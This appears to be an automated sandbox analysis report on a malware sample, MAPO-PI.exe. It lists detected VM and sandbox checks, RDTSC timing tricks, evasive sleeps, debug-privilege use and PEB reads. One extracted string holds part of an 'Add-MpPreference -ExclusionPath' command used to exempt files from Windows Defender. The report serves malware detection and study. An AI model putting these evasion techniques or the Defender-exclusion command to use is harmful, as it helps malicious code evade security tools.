Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.MAPO-PI.exe.25fd0c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MAPO-PI.exe PID: 3868, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003039B4E second address: 0000000003039B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 1752 Thread sleep time: -43348s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 2952 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1552 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4856 Thread sleep time: -54000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6932 Thread sleep time: -65000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5905 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2572 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 43348 Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.278762456.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.273464193.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.272236107.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000004.00000000.258291932.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h] 3_2_018BC182
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h] 3_2_018CA185
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h] 3_2_018C2990
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h] 3_2_018C61A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h] 3_2_018C61A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h] 3_2_019151BE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h] 3_2_019151BE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h] 3_2_019151BE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h] 3_2_019151BE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h] 3_2_019549A4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h] 3_2_019549A4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h] 3_2_019549A4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h] 3_2_019549A4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h] 3_2_019169A6
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0189B1E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0189B1E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0189B1E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h] 3_2_019241E8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h] 3_2_01899100
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h] 3_2_01899100
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h] 3_2_01899100
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C513A mov eax, dword ptr fs:[00000030h] 3_2_018C513A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C513A mov eax, dword ptr fs:[00000030h] 3_2_018C513A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h] 3_2_018BB944
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h] 3_2_018BB944
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h] 3_2_0189C962
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h] 3_2_0189B171
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h] 3_2_0189B171
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899080 mov eax, dword ptr fs:[00000030h] 3_2_01899080
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01913884 mov eax, dword ptr fs:[00000030h] 3_2_01913884
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01913884 mov eax, dword ptr fs:[00000030h] 3_2_01913884
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h] 3_2_018D90AF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h] 3_2_018CF0BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h] 3_2_018CF0BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h] 3_2_018CF0BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0192B8D0
